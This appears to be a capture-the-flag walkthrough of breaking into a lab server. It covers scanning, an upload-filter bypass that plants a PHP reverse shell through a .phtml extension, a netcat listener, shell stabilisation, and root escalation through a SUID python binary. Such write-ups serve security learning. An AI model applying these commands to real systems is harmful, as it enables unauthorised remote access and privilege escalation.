Use RustScan to scan the server.
Now, let’s find some hidden directories with gobuster.
Uploading a reverse shell 💀
Uploading section of the server is very weak. It only check the extension.
Download PenTestMonkey’s php reverse shell from here and edit it suitabaly.(Add your IP address and a port)
Now Start a listener using
nc -lvnp 9090. You can use any port number. (Make sure to edit the reverse shell too)
Now, when I tried to upload it, it didn’t work. So, I tried changing the MIME type via BurpSuite and it didn’t work too.
Then I tried to use Magic Bytes of GIF (GIF87a) and it uploaded but when I tried to open it using the browser it detects it as a image and gives an error message.
So, Then I started to bruteforce extensions that are allowed to upload. I found that except .php every other php extension were allowed to upload.
PHP has alternative extensions such as .php, .php1, .php2, .php3, .php4, .php5, .phtml
*.phtml extension and it worked!
Now, navigate to
http://<SERVER-IP>/uploads/ you will find your reverse shell.
Now stabilize the shell using,
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo; fg
Privillage Escalation (Root) 🦾
Find SUID binary’s using
find / -user root -perm /4000
You will find
/usr/bin/python there. It is vulnerable and can be exploited with
/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")' command.
Thanks lot for reading this article.